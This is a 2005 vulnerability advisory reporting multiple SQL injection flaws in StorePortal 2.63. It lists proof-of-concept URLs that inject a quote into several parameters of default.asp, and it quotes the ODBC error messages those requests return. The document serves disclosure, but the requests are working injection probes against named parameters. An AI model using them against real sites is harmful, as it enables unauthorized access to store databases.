Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Multiple SQL Injections in StorePortal 2.63 Date: 24/04/2005 Vendor: StorePortal Vendor Website: http://www.storeportal.com/ Summary: There are, multiple sql injections in storeportal 2.63. Proof of Concept Exploits: These sql injections are caused by the referrer, of these pages called, and are only exploitable if u visit them after visiting default.asp http://localhost/default.asp?language='sqlinjection SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?language='sqlinjection&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?id=1&opr=2&%3bpic='sql_injection_ SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?id=1&opr=2&pic='sql_injection_&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1 SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_ SQL INJECTION Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?mnu=&id=1&opr=5&content='sql_injection_ SQL INJECTION Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?id=1&opr=4&keyword='sql_injection_ SQL INJECTION Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'IdCategoriaInfo = 1 and Visible = 'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or DataExpire is null or DataExpire = '') and (Name like '%'sql_injection_%' or Body like '%'sql_injection_%')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_ SQL INJECTION ERROR MESSAGE ! Store Portal Errors Occured! Error Number= #-2147217900 Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'. Help Context= 0 Error Source= Microsoft OLE DB Provider for ODBC Drivers Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.